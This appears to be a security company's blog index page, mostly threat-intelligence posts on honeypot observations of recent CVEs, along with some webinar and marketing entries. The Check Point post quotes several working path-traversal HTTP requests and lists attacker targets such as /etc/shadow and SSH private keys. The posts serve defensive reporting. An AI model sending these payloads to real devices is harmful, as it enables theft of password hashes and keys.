Blog
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

SolarWinds Serv-U (CVE-2024-28995) exploitation: We see you!

On June 5, 2024, SolarWinds published an advisory detailing CVE-2024-28995 - a path-traversal vulnerability in Serv-U, discovered by Hussein Daher. Our Labs team - with our brand new deception engineer - seized this opportunity to deploy a new honeypot they've been working on. It's supposed to look more real - and vulnerable! - than past honeypots.

What did they discover?

They show off all kinds of information gleaned from their honeypot - who's attacking it, what files they're trying to steal, how often they come back, and more.

But, that's not all!

They actually managed to capture a live attacker making several copy/paste mistakes, and attempting to correct the exploit only to foul it up again! They track the attacker's progress over the course of 4 hours, including one instance where they sent the completely wrong exploit (which happens to be for an unpatched vulnerability!).

Check out the full blog on GreyNoise Labs to learn more about this vulnerability and our observations.

What's Going on with CVE-2024-4577 (Critical RCE in PHP)?

Check out the latest from GreyNoise Labs as we examine the technical details of CVE-2024-4577, a serious remote code execution vulnerability in PHP affecting Windows deployments. Discovered by DEVCORE and demonstrated by watchTowr, this vulnerability exploits a 'best-fit' Unicode processing behavior in Windows. This allows attackers to inject command-line arguments via HTTP requests.

Detailed examples of payloads observed in the wild to achieve remote code execution are included, showcasing how attackers exploit the vulnerability in the real world. These payloads range from simple PHP code snippets to more complex scripts that download and execute malicious binaries.

Check out the detailed post here for a deeper dive into the technical details and the full range of payloads.

What’s Going on With Check Point (CVE-2024-24919)?

On May 28, 2024, Check Point published an advisory (and emailed customers) regarding CVE-2024-24919, a CVSS 8.6 vulnerability that they described using fairly vague language: "exploiting this vulnerability can result in accessing sensitive information on the Security Gateway. This, in certain scenarios, can potentially lead the attacker to move laterally and gain domain admin privileges."

Although they buried the lede a bit, if you scroll way down and click through a bit, you'll see that attacks in the wild occurred as far back as April 7, 2024 (nearly 2 months)! Two days after the advisory came out (May 30, 2024), we published a tag, which currently shows rapidly increasing exploitation:

Although you can’t see it on the graph, the very first attempts we saw were on May 31, 2024 at around 9:30am UTC. We also observed some attempted exploits on May 30, 2024, but they don’t show up in our public data because they don’t actually work (more on that below).

On the same day (May 30, 2024), watchTowr labs published an amazing write-up that includes a working proof of concept. On that same day, CISA added it to the Known Exploited Vulnerabilities list.

On May 31, 2024, our friends at Censys published their write-up, which indicated that there are nearly 14,000 devices running some version of that software, although it’s not clear how many of those have exposed management ports.

The vulnerability

The core vulnerability is a pretty straight-forward path traversal issue. One of the folks on my team reverse engineered the patch concurrently with watchTowr and came up with basically the same exploit (this one is from watchTowr):

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Since the server runs as root, an attacker can grab any file on the filesystem! We’ll show you what attackers are actually searching for below.

Our observations

Sift

Although we tagged this issue very quickly, we actually saw the first exploit attempt (attempt), with a non-working exploit, hitting Sift on May 30, 2024 - presumably somebody thought they’d figured it out and pushed the big “go” button a bit too quickly:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)

/clients/MyCRL/../../../..//etc/shadow

We started seeing actual exploitation attempts logged in Sift on May 31, 2024:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Connection: close
Accept-Encoding: gzip
Connection: close
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

aCSHELL/../../../../../../../etc/shadow

I’m always impressed when an automated system can catch a novel exploit without being told about it!

Honeypot data

We manually searched our honeypot data going back 90 days prior to today (June 4, 2024), and the oldest exploit attempts that we see started on May 30, 2024, at about 5pm UTC:

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/<IP_ADDRESS> Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 38

/clients/MyCRL/../../../..//etc/passwd

The word “attempts” is doing a lot of work in that sentence because, from what we can tell, this payload doesn’t actually work - perhaps somebody pressed the big red button before actually testing their exploit?

In any case, the IP address using that broken payload was 125.229.221.55, a Taiwan-based address that started scanning for HNAP-enabled devices on May 30, 2024, then a few hours later (on the same day) started scanning for CVE-2024-24919. We can’t say with certainty whether the HNAP scan is related, but it’s the only other traffic we’ve ever seen from that IP address. In the exploits, the IP attempted to fetch /etc/passwd and /etc/shadow.

The first real exploitation we observed began on the morning of May 31, around 9:40am UTC, when a New York-based IP address, 45.88.91.78, took a break from searching for CISCO ASA appliances and started launching exploits for this issue with a payload that would appear to actually work (and, in fact, is suspiciously identical to watchTowr’s PoC, including the number of ../s):

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:82.0) Gecko/20100101 Firefox/82.0
Connection: close
Content-Length: 39
Accept-Encoding: gzip

aCSHELL/../../../../../../../etc/shadow

Around that same time, a chorus of different scanners emerged that used a bunch of different paths. Due to the nature of the vulnerability, it’s very hard to determine the actual intent of the attacker - all we know is which file they’re trying to fetch. Whether they’re using that to steal passwords or to test the vulnerability is hard to know.

That being said, as of June 4, 2024, here is the top-10 list of plausibly-working payloads that we’ve observed, with the counts:

4805 ../../../../../../../etc/fstab
2453 ../../../../../../../etc/shadow
980 ../../../../../../../sysimg/CPwrapper/SU/Products.conf
959 ../../../../../../../config/db/initial
508 ../../../../../../../etc/passwd
202 ../../../../../../../home/*/.ssh/authorized_keys
166 ../../../../../../../opt/checkpoint/conf/
165 ../../../../../../../etc/ssh/sshd_config
163 ../../../../../../../etc/vpn/vpn.conf
161 ../../../../../../../home/*/.ssh/id_rsa

It’s interesting to contrast that with this list, which we generated yesterday (June 3, 2024):

1615 ../../../../../../../etc/fstab
491 ../../../../../../../etc/passwd
486 ../../../../../../../etc/shadow
197 ../../../../../../../home/*/.ssh/authorized_keys
161 ../../../../../../../opt/checkpoint/conf/
160 ../../../../../../../etc/ssh/sshd_config
158 ../../../../../../../etc/vpn/vpn.conf
156 ../../../../../../../home/*/.ssh/id_rsa
94 ../../../../../../../home/*/.ssh/known_hosts
83 ../../../../../../../home/root/.ssh/authorized_keys

As you can see, /etc/fstab remains a popular target - probably it’s a reliable path being used by some off-the-shelf scanner(s).

/etc/shadow of course remains popular, but we’re suddenly seeing a lot of attempts to pull

/sysimg/CPwrapper/SU/Products.conf and /config/db/initial that we weren’t seeing yesterday. That demonstrates how the attack is evolving day over day!

Unfortunately, we didn’t directly observe the 0-day exploitation prior to the advisory being released; presumably, the attacks were targeted and didn’t hit our sensor network (although as we expand our new sensors and personas to real networks, we expect to start seeing this type of 0-day exploitation in Sift!)

Conclusion

With a public proof of concept out, and exploitation quickly ramping up, we recommend patching Check Point as soon as possible!

References

Cybersecurity in the Age of AI: What Experts are Saying

The cybersecurity market is undergoing a noticeable shift with the integration of AI, transitioning from using AI as a replacement for Googling to leveraging its advanced capabilities in pattern recognition and anomaly detection. Currently, there are many questions about what AI can truly achieve today and what the future holds. To address this, we assembled a panel of seasoned security professionals for an open discussion on the real potential of AI in cybersecurity and what is merely adding to the noise.

On Thursday, May 30th, GreyNoise is hosting a live webinar “AI for Cybersecurity: Sifting the Noise.” To give you a taste of what’s to come, we have asked each of our presenters a key question touching on one of the many topics we will explore in the discussion, let’s dig into their answers below:

Bob Rudis, VP of Data Science and Research

Q: What do you think is currently the biggest lie about AI?

A: The biggest misconception is that AI (particularly LLMs/GPTs) is seen as more than just a tool. Unlike traditional machine learning or a dictionary/thesaurus, these AI systems are marketed as intelligent actors or companions. However, they are simply tools that excel at understanding human input and generating responses based on vast amounts of data. Their perceived intelligence comes from their ability to produce useful outputs by recognizing patterns in data, not from any inherent understanding or consciousness.

Daniel Grant, Principal Data Scientist

Q: What AI advancement in the past few years are you most excited about?

A: The most obvious advancement is the development of highly capable LLMs. Just a few years ago, getting GPT-2 to produce coherent text was a challenge. Now, we have 70-billion parameter models that can run on laptops and chatbots that can pass the Turing test at your local Toyota dealership. Another exciting advancement is the improved quality of vector databases, which allow for direct, real-time access to entire datasets, reducing the need for compact machine learning models.

Ron Bowes, Security Researcher

Q: What's the most surprising thing an AI you've used has surfaced?

A: At GreyNoise, we developed a tool called Sift, which runs traffic seen by honeypots through magic machine-learning algorithms to help us (and customers!) see what attackers are up to each day.

One exploit that stood out to me a couple months ago was an attempt to exploit F5 BIG-IP that I wrote about on our Labs Grimoire blog. I'd recently spent time tidying up our F5 BIG-IP rules, since there's a lot of overlap between the various vulnerabilities and exploits (that is, several different vulnerabilities use very similar-looking exploits, and some of our older tags were mixing them up). One of the vulnerabilities I ran into was an exploit for CVE-2022-1388 (auth bypass), chained with CVE-2022-41800 (authenticated code execution, which I initially discovered and reported).

What was particularly interesting about that one is that they used the proof of concept (PoC) from the original CVE-2022-41800 disclosure, which I had designed to look super obvious, instead of using the actual exploit we also released. Not only that, but because CVE-2022-41800 is an *authenticated* RCE, they combined my PoC with a separate authentication-bypass vulnerability (CVE-2022-1388), which already had an RCE exploit that didn't require a secondary vulnerability. So, not only did they use the super obvious PoC, its usage was entirely unnecessary as well!

Presumably, the point of using this unusual combination was to avoid detection, but instead they just stood out more!

---

If these insights pique your interest, join us on Thursday for the live event where you can ask your own questions to our expert panel.

Honeypots Are Back: The Movie: The Blog

GreyNoise was founded to see what others don’t. That quest led us to build a unique global network of thousands of sensors across hundreds of strategically selected points of presence, giving cybersecurity practitioners unparalleled insight into online activity, whether malicious or benign. 

And in 2023, we saw something new.

In the second quarter of 2023 GreyNoise researchers observed a substantial change in internet scanning behavior. Malicious inventory scans significantly reduced in frequency and scale, and the vast majority of these types of scans now come from benign sources. This, along with the speed at which compromises follow vulnerability announcements, strongly suggests more capable attacker groups have implemented their own form of “attack surface monitoring”, to avoid tripping existing defenses. Attackers are now less likely to risk their reconnaissance infrastructure being detected and flagged prior to establishing confidence in a successful attack path.

A change in attacker behavior is rendering current defenses less effective. But an established technique is ready to rise to the challenge. Honeypots are back.

With attackers routing around observation and detection, traditional third-party threat intelligence cannot provide the targeted attack visibility that defenders need. A first-party, honeypot-based approach is ready to step into the breach.

While honeypot programs have traditionally struggled with deployment, operation, and data analysis, new technology is changing the game. Advances in infrastructure automation, network traffic shaping, cloud computing, and artificial intelligence make it possible to consistently identify novel attacks and reveal attacker infrastructure. New honeypot networks are easy to deploy, with flexible impersonation, believable personas, and automated analysis. Whether on an organization’s perimeter or deployed across the globe, they provide the insights defenders need to protect key systems before a breach. 

At GreyNoise, we haven’t just focused on tech leadership — we’ve brought in thought leadership as well. In order to educate the market about these new challenges, and how honeypots can help tackle them, our deception and intelligence experts Andrew Morris and Bob Rudis have published the Honeypots Are Back report. This report:

  • Breaks down targeted attacks
  • Compares third- and first-person threat intelligence
  • Discusses traditional honeypot challenges
  • Establishes a new honeypot maturity framework
  • Provides a security checklist for defenders to implement this necessary capability

To dive deeper into each of these topics, read the report here. To see a demonstration of the new honeypot capabilities under development at GreyNoise today, watch our on-demand honeypot webinar here. And if you’re ready to discuss standing up a mature honeypot network in your own environment, talk to our team

NetNoiseCon - Recapping our Debut Event

We had a blast at NetNoiseCon on April 19th and we hope you did too! If you missed out, don't worry - we've got you covered with this recap.

From incredible technical talks to insightful career advice from industry leaders, there was something for everyone. We strongly encourage you to watch each of the talks and soak in the wisdom shared by our stellar lineup of speakers.

Watch the full playlist of NetNoiseCon videos on YouTube here.

Technical Talks & Briefs:

Special Storm⚡️Watch briefing from boB Rudis - GreyNoise’s boB Rudis shares a fun and insightful brief on several active APT groups and the targeting of industrial control systems.

Trashing the Pandas: Analyzing Current Infrastructure Trends and T9000v2 - A Mustang Panda Case Study - This incredible technical talk from floofpwn was a crowd pleaser. Join floofpwn as he analyzes Mustang Panda malware and explores current infrastructure trends. Threat Hunters & Researchers should dig this talk!

Methods of Finding Threat Signals - Proofpoint’s Greg Lesnewich presented his methods for finding signal within the noise, finding anomalies in the data, and how to use layering techniques to find threats.

Vintage Internet Noise - GreyNoise’s Kimber Duke dives into the vintage internet vulnerabilities, many of which are 20+ years old, that still haunt us today.

Out of Touch, Out of Timeline - Making Sense of Temporal Correlation - Jonathan Reiter from Dragos shares his method of time series analysis, leveraging tools like GreyNoise’s timeline of observed activity, to investigate scan and host behavior.

Career Advancement & Advice Talks

Brain skills | functions | AI - Santiago Holley, VP of Threat Management at Redtrace Technologies, shares his thoughts on the strengths of AI and the inherent strengths of humans and how our brains work - and how we can bring those two together.

Stress, Mindfulness, & Mental Health in Cybersecurity - Matt Johansen, writer of the Vulnerable U Newsletter, explores the particular challenges and stresses that many in cybersecurity face, and how to deal with them. This is a fantastic honest look at our work in InfoSec and the struggles that many have with mental health.

How I Got Into CyberSecurity - GreyNoise Ambassador Joseph McDonagh shares his unorthodox career path from the military into cybersecurity. At the end, Joseph also shares how he uses GreyNoise “backwards” and leverages Splunk.

---

Huge thanks to all of our speakers - we really appreciate their time and insight.Also - Thank you to everyone who tuned in and joined us live at NetNoiseCon, we had a blast!

We will bring NetNoiseCon back later this year, so stay tuned for more news about the next event. In the mean time, join us on Discord and say Hi!

2024 Verizon DBIR: Surviving the Year of the Vuln

The 2024 edition of the Verizon Data Breach Investigations Report (DBIR) has finally been released! The team did their usual bang-up job pulling key knowledge threads from the massive volume of data submitted by their ever-increasing number of contributors (of which GreyNoise is one!). Our researchers have pored over this tome to identify critical themes that should be of great import to GreyNoise customers and community.

The Year Of The Vuln

Identifying when attackers attempt to exploit vulnerabilities on internet-facing endpoints is at the heart of what we do at GreyNoise. So, it comes as no surprise that the DBIR team “witnessed a substantial growth of attacks involving the exploitation of vulnerabilities as the critical path to initiate a breach when compared to previous years.” The 180% increase was felt — almost daily — by all who keep track of headlines in the cybersecurity press. Our GreyNoise sensor fleet caught an extra 200K unique IPv4 addresses slinging malicious tagged activity our way (4.2 million malicious IPv4s in 2022 vs. 4.4 million in 2023), and the volume from those adversarial sources went from just over 10 million malicious tagged events to 13+ million.

One thing we did not expect was vulnerability exploitation chipping away at the volume of both credential-based attacks and phishing as the critical path action to initiate a breach, as seen in Figure 6 from the report:

Historically, phishing has been one of the most successful attack paths for our adversaries, and the volume of lost and stolen credentials is stunningly huge. However, organizations have been steadily investing in both more advanced phishing protection (including awareness training); and, credential blasts are both noisy and increasingly thwarted as organizations rely more heavily on elevated protections provided by identify and authentication providers like Okta.

Conversely, using internet infrastructure to find and exploit vulnerable, exposed services can be a risk-free activity for attackers, and there is an almost endless supply of both new vulnerabilities and unpatched hosts. GreyNoise excels at identifying this activity, and we provide the timeliest and most comprehensive information on those attack types and sources, bar none.

It was also a bit distressing, but not unsurprising (given Figure 6) seeing that vulnerability exploitation was at the heart of third-party-related breaches.

Figure 10. Action varieties in selected supply chain interconnection breaches (n=1,075)

You Don’t Have Time To Patch

Every defender should print out page 21 of the 2024 DBIR and tape it to their wall (or, cubicle, if you’re in the 50% of IT folks still commuting to offices).

Most cybersecurity folks are not familiar with the “survival analysis” shown in Figure 19. It’s just a fancy way of estimating the time until some event occurs. This analysis focuses on vulnerability remediation data (i.e., “patching”), with an emphasis on how long it takes organizations to patch vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog.

GreyNoise researchers are huge fans of CISA KEV. We even benchmark ourselves against it! We meet or beat CISA over 62% of the time when it comes to having a tag ready for defenders to use. How do our customers use these tags? Well, the primary way is to block activity from IP addresses associated with these tags. While this may not prevent pinpoint targeted attacks, it absolutely buys them time to keep safe from opportunistic attacks, and helps them identify those targeted attacks much faster, and with greater precision.

Our own data clearly shows that once a proof-of-concept (PoC) is available, attackers waste zero time going after vulnerable systems. And, there is increasingly little daylight between when a CVE is published and when a PoC becomes available.

Seeing that 85% of CISA KEV entries remain unpatched after 30 days clearly shows that most organizations have no time to patch. This means protecting these assets from harm during that 30-day exposure is paramount.

Closing The Door On Attackers

The DBIR team used the “open door” metaphor for how attackers made their way into organizations in 2023. At GreyNoise, we’re highly focused on helping organizations safeguard every single entry point in their internet-facing infrastructure, while also laying out some of our own trapdoors to help confuse and ensnare them.

With GreyNoise, organizations can gain an edge over their adversaries, using our advanced sensors to identify targeted attacks quicker than ever before. Combined with the proven, battle-tested intelligence in our existing Noise dataset, defenders now have the tools to both make it extremely difficult for attackers to be successful, and slow them down long enough to finish asset remediation efforts. Join us as we work to chip away at the million-incident record the DBIR set this year, and turn the tide against our combined foes! You can get started with our data here, or connect with our team to talk about advanced features.

What We're Reading: April 2024

Sam Houston // Senior Community Manager

💡 AWS Made Easy Livestream Ep. 99.5 | Rahul Subramaniam + Stephen Barr 

Thoughts: Ezra’s Klein’s interview with the CEO of Anthropic is an interesting discussion about the speed of growth of the industry and the impact AI will have on our electricity consumption, the impact on jobs, and more. Very interesting listen!

Bob Rudis // VP Data Science & Research

🚀 Book: The Ascendant Wars: Hellfire | Rhett C. Bruno & M.B. Vance

Why I like it: It has stylistic and narrative elements like The Expanse novels, and presents an intriguing future where some humans (dubbed Wardens) have outgrown their humanity thanks to bioengineering and rule the galaxy with ruthless efficiency. This story centers around the folks impacted by a particularly horrible Warden who decides to mess with the pseudo-stability of the regime in order to gain control. Excellent writing.

🪙 Article: Lessons after a half-billion GPT tokens | Ken Kantzer 

Thoughts: It was a good read as well. I don't necessarily agree with all the points, but the author's practical take on making real-world apps with "AI" is very refreshing amidst all the hype.

Louis Evans // Director of Product Marketing

💨 Atmospheric Disturbances | Rivka Galchen

Why I like it: This brilliant, disturbing novel centers on a psychiatrist suddenly convinced his wife has been replaced by an imposter (presumably a reference to a real disorder, Capgras delusion) and that the secret to finding his real wife is hidden in an obscure paper by a research meteorologist—clearly based on the author’s own father. Hilarious, insightful, surprisingly punny—and though written in 2006, the bite-sized chapters are perfect for our age of internet distractions (just me?).

🚪 The Saint of Bright Doors | Vajra Chandrasekera

Thoughts: Incisive, bizarre, and with a last-act twist that slides perfectly, yet shockingly, into place, The Saint of Bright Doors is certainly deserving of its string of award nominations. I saw Chandrasekera read an excerpt from this book on his tour; he chose the scene where the protagonist’s mother tells her son “the doctors will tell you I’m dying of cancer . . . but really it’s because I’m disappointed in you.” But Bright Doors does not disappoint. 

🐉 The Dragon Waiting | John M. Ford

TLDR: Neil Gaiman wrote that this book “contains no dragons”. It’s not quite true—and Gaiman’s full quote contains a qualifier that I’m cunningly concealing from you—but close enough. Now consider what it means to recommend a dragonless book about dragons. Familiarity with the Wars of the Roses and strong opinions about the Byzantine empire will be greatly rewarded. 

Ron Bowes  // Lead Security Researcher

🪄 Book: Maximum Entertainment 2.0 | Ken Weber

Why I like it: It is a book about having a more interesting stage presence as a magician. I'm not a (professional (or good)) magician, but telling stories and being interesting on stage applies to all of us!

🧛 Book: The Twelve | Justin Cronin 

Backstory: Vampire fiction might be too embarrassing to post…for context, I go to the local used bookstore to buy random books. I bought "The Passage" by Justin Cronin and got sucked into (🥁) the story about the world being overrun by a vampire virus. Halfway through, I realized it's a trilogy; now I'm halfway through the second book ("The Twelve"), with the third ready to go. 

🌟 Textbook: Improv 101 | Jet City Improv 

Thoughts: Improv classes are a great way to meet people, build confidence, and have fun in a super supportive environment!

Konstantin // Senior Researcher

🧠 Book: Being You: A New Science of Consciousness | Anil Seth 

Thoughts: It is a nice read. Basically, “the entirety of perceptual experience is a neuronal fantasy that remains yoked to the world through a continuous making and remaking of perceptual best guesses, of controlled hallucinations.” Or how I stopped worrying and learned to love the absence of free will.

Exploring GreyNoise: The User-Centric Design Approach in Cybersecurity

In today’s cyber landscape, blending robust security with effective design is not just beneficial—it’s essential. At GreyNoise, we integrate design principles from the very beginning of our development process, ensuring that every security measure is user-focused and seamlessly integrated. This approach doesn't just enhance the security of digital services; it also ensures that updates and innovative controls fit perfectly within existing systems.

Empowering Users with User-Centric Design

Our philosophy at GreyNoise centers around understanding and addressing your needs, challenges, and feedback. By prioritizing user-centric design, we ensure that each feature and update is not just powerful, but also relatable and engaging.

Putting You First: Your needs, challenges, and feedback are what drive us at GreyNoise. We believe that understanding your perspective is key to making our cybersecurity solutions not just powerful, but also relatable and engaging.

Anticipating Security Needs: We proactively incorporate mechanisms like security logging, monitoring, alerting, and response capabilities into our systems, preparing for potential security incidents before they occur [1].

Join Our Community on Slack: Your insights are invaluable. Engage with us on Slack to share your experiences and suggestions, playing a pivotal role in our product iteration process. Join our Community on Slack.

Simplicity and Accessibility: The Hallmarks of GreyNoise Design

Our commitment to simplicity and accessibility ensures that our tools are straightforward and can be used by everyone. Here’s how we achieve this:

Clutter-Free Interface: Simplicity is central to GreyNoise’s design ethos. Our interfaces are streamlined, focusing on delivering essential information efficiently to prevent overload and facilitate quick, informed decisions.

Focused Feature Set: We hone in on the most impactful features, ensuring our tools are straightforward and effective, making complex threat analysis accessible to all users.

Inclusive Design Philosophy: Upholding the principle that cybersecurity should be accessible to everyone, GreyNoise designs tools that cater to a wide range of abilities, embodying our inclusive design philosophy. Our proof of promise and commitment to accessibility is demonstrated through our Voluntary Product Accessibility Template (VPAT), which details how our products adhere to recognized accessibility standards. This transparency underscores our belief in making security tools accessible to everyone, affirming that effective security is a universal right.

Visual Engagement: Simplifying Complex Information

GreyNoise uses visual elements like infographics to break down complex information, making cybersecurity concepts more understandable and engaging, illustrating the practical benefits of our design-driven approach.

View: https://viz.greynoise.io/tags/palo-alto-pan-os-cve-2024-3400-rce-attempt?days=10

Real-World Applications and User Experiences

GreyNoise consistently demonstrates its commitment to enhancing user capabilities through various educational and interactive platforms. We offer comprehensive demos and case studies, which are pivotal for users looking to deepen their understanding of cybersecurity practices [2]. These resources are tailored to help both novice and advanced users by providing practical, real-world applications of GreyNoise's cybersecurity solutions.

Additionally, GreyNoise is proactive in addressing future cybersecurity concerns by hosting webinars, such as the recent discussion on the future of honeypots. These events aim to educate participants on strategies to combat targeted attacks, reflecting GreyNoise's dedication to keeping the cybersecurity community informed and prepared [3].

A Fusion of Cybersecurity and Design

At GreyNoise, we are redefining the synergy between security and design. Our dedication to user-centric, simple, and accessible design propels us to deliver tools that are not just powerful but also intuitive and inclusive. With GreyNoise, you are equipped with cybersecurity tools designed for the modern digital landscape, where effective security seamlessly integrates with exceptional user experience.

Key Innovations and Features

1. Explore and Investigate: Users can delve into detailed analyses of IP activities, enhancing their understanding and ability to react swiftly to potential threats [4].

2. IP Timeline and Details: Offers a comprehensive view of an IP's history and current status, allowing users to track and analyze behavior patterns over time [5].

3. Alerts and Blocklists: Enables proactive responses with customized alerting systems, ensuring users can respond to threats promptly [6].

At GreyNoise, we don’t just create tools; we build solutions that integrate effective security with exceptional user experience. Our commitment to user-centric, simple, and accessible design drives us to deliver products that not only protect but also empower our users.

Explore GreyNoise’s Design-Centric Cybersecurity Solutions

Dive deeper into how our design-centric cybersecurity solutions can transform your security strategy. Interact with our tools, join our community forum on Slack to share your insights and help shape the future of cybersecurity.

FAQs: 

How does GreyNoise ensure its design is user-centric?

GreyNoise integrates user feedback throughout the design and development process, ensuring that our tools meet real user needs effectively and intuitively.

What are GreyNoise’s key design principles?

We focus on simplicity, user-centricity, and accessibility to ensure our cybersecurity tools are effective and easy to use for everyone.

How can I provide feedback on GreyNoise products?

Join our Slack community! It’s a vibrant space where you can provide direct feedback, suggest improvements, and influence our product development.

Reference: 

  1. Secure by Design Principles
  2. GreyNoise Blog
  3. GreyNoise Resources
  4. GreyNoise Product Overview
  5. IP Timeline Feature
  6. Alerts and Blocklists

Decrypting Fortinet's FortiOS 7.0.x

Curious about decrypting Fortinet's FortiOS 7.0.x firmware? In the latest Grimoire post, we delve into the technical details of doing just that, revealing a hardcoded key used in the ChaCha20 encryption algorithm and the steps required to extract the decrypted rootfs.gz file. With this information, researchers can investigate the relevant vulnerabilities and help users address potential security risks.

Check it out over here.

GreyNoise Tags Its Way to 1337 Elite Status

Yesterday, GreyNoise reached a fun and significant milestone after publishing our 1,337th tag. 1337 is a cherished number in hacker culture, as it is a numerical shorthand for "leet", which itself stands for "elite". This term has deep roots, going all the way back to the 80's when one had to make modems scream to access bulletin board systems (now, we humans are the ones screaming whenever we go online to see what fresh hades awaits us each day).

What makes this milestone even more significant is how it was achieved.

The chart, below, shows the cumulative sum of tag counts by year. While there was a modest improvement in intra-year tag creation from 2022 to 2023, we're just into the first few weeks of Q2 in 2024 and are almost at the total tag count for 2023.

We will almost certainly blow past 2023's tag count well-before the end of Q2, and this has all been made possible by our focused and practical use of AI. This system helps our incredible detection engineers quickly triage the millions of events our sensor fleet absorbs every day. With it, they discover and tag novel payloads to help inform and protect our customers, community, and the internet as a whole. The application that fuels this work is called Sift, and we've waxed poetic about it quite a bit over the past few months.

This boost to the tag inventory has also meant an increase in CVE coverage.

(Since it most likely drew your attention, the jumps in 2022 were due numerous factors, including the increase in Russian hostilities towards Ukraine.)

60% of 2024 tags are based on CVEs, and — along with plenty of "modern" vulnerabilities — Sift has helped us catch exploitation attempts of some very old CVEs, too:

I'm incredibly proud of our team of data scientists, security researchers, and detection engineers. Their leet expertise powers the detections that folks rely on every day, and we hope you'll join in our celebration of achieving this epic milestone!

To learn more about GreyNoise tags and how they differ from "traditional" detections, check out our Tags Webinar Series.

CVE-2024-3400: Command Injection Vulnerability in Palo Alto Networks PAN-OS

On April 12th, 2024, Palo Alto Networks announced CVE-2024-3400. CVE-2024-3400 is a CVSS 10 critical arbitrary file-write vulnerability in Palo Alto Networks PAN-OS software versions 10.2, 11.0, and 11.1.  This vulnerability enables unauthenticated attackers to execute arbitrary Linux commands with root-level privileges on affected firewalls if firewalls are configured with a GlobalProtect gateway or portal (or both) and device telemetry enabled.

Palo Alto and Unit 42 have confirmed that threat actors have exploited CVE-2024-3400 in a limited number of attacks in the wild. CISA published guidance and added it to the Known Exploited Vulnerability (KEV) on Friday, April 12, 2024.

Palo Alto Networks released workaround guidance and some hotfixes on April 14, 2024. Customers can also mitigate the vulnerability by enabling Threat ID 95187 if they have a Threat Prevention subscription, or by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version.

GreyNoise is tracking opportunistic exploitation attempts here.  As of April 15, 2024, 17:00 UTC, no attempts have been observed by our fleet. 

Of note: our sensor fleet has detected instances of nonworking exploits that have been circulated online, claiming to be for CVE-2024-3400. This indicates that opportunistic exploitation will quickly follow once a successful exploit code is released.

Leveraging AI Advances to Improve Intelligence for Discovery, Identification, and Interpretation

AI is so hot right now, and the cybersecurity space is no exception. Technology leaders are unveiling exciting new capabilities, vendors are making extravagant claims, and practitioners are working hard to understand how to separate the wheat from the chaff, leveraging AI where it can make the most difference to their operations’ and their organization’s risk.

Here at GreyNoise, we’ve been investigating where AI capabilities can have the biggest impact, and then working to deploy them internally, externally, and in partnership with other security vendors. In this blog we’ll discuss several GreyNoise AI projects and how they’re helping defenders identify and understand threats and secure their environment.

Sift: AI for Anomaly Discovery

Traditional automation is rule-based and rigid. “IF a packet matches this malware signature, THEN block it AND generate an alert”, etc. AI-based approaches are different. AI makes it possible to automate pattern recognition—and its inverse, anomaly discovery. With AI, defenders can rapidly process high volumes of data, and automatically identify the most suspicious observations for high-priority analysis and triage.

Sift is GreyNoise’s tool for solving this problem. It leverages multiple advanced AI techniques, including: 

  • custom-built LLMs (Large Language Models) 
  • nearest neighbor search and vector databases 
  • unsupervised clustering

Sift runs daily, helping our research team process the data generated by our global sensor fleet to identify novel behavior, traffic, and attacks.

For more on Sift and how it works, check out our technical launch blog here

Sift: AI for Targeted Attack Identification

But Sift doesn’t stop there. The same techniques can be applied to the data generated by targeted subsets of our sensors, helping specific organizations generate intelligence insights and reports tailored to observations from their own networks. This AI application will bring the industry-leading research capabilities of GreyNoise into any organization’s internal security processes, reducing triage overhead, accelerating attack identification, and making life easier for defenders—and harder for attackers.

For more on how to bring the insights of Sift into your own organization, talk to our team.

Copilot: AI for Interpretation

The capabilities of AI aren’t limited to stochastic data analysis. Recent advances in transformer architectures and LLMs have cracked the natural language barrier, making it possible to generate well-formulated utterances at scale. This has opened up a new frontier of AI assistants. Microsoft Copilot for Security is leading the charge to bring these capabilities into the cybersecurity space, and GreyNoise is working together with Microsoft on this initiative. We’re a partner in the Microsoft Copilot for Security Partner Private Preview, and our plug-in means that both free and enterprise users can access GreyNoise insights from within their Copilot interface with natural language prompts.

For more on how GreyNoise and Microsoft Copilot for Security work together, check out our dedicated integration page.  

The Future of AI

The future of AI is hard to predict, and the evolution of the field has famously surprised both boosters and skeptics. Organizations looking to leverage these rapidly transforming capabilities will need to roll with the punches—and continue to partner with security vendors who can do the same. Here at GreyNoise we’re committed to doing just that. We’re excited to share how AI is already empowering our security—and we can’t wait to see what’s next.

CVE-2024-3273: D-Link NAS RCE Exploited in the Wild

A remote code execution vulnerability in D-Link NAS devices is actively being exploited and is tracked under CVE-2024-3273. The vulnerability is believed to affect as many as 92,000 devices and further information can be found on D-Link’s support announcement.

(04/11/2024): Clarification on CVE-2024-3273 & CVE-2024-3272

Exploitation of the CVE-2024-3273 command injection vulnerability requires the two valid `user=` and `passwd=` parameters. There is a companion vulnerability tracked as CVE-2024-3272 and describes the issue as "manipulation of the argument user with the input messagebus leads to hard-coded credentials". It is important to note that the "credentials" as described are only the username for the user "messagebus".

"messagebus" is not a backdoor account. It is one of many common pre-configured linux system users that functionally cannot "log in", and thus have no password. Other common example system users include avahi, syslog, nobody, ntp, rtkit, and whoopsie. D-Link correctly validates that the username exists and also correctly validates that the provided password is correct. The logic flaw exercised by CVE-2024-3273 is that the empty (correct) password for the "messagebus" user is never validated that the user should ever be able to log in using a password, if at all.

(04/09/2024): Update on number of vulnerable devices

Upon further analysis, it appears the number of vulnerable devices is much lower than initially reported.  According to our friends at Censys, the number is closer to 5,500 devices.

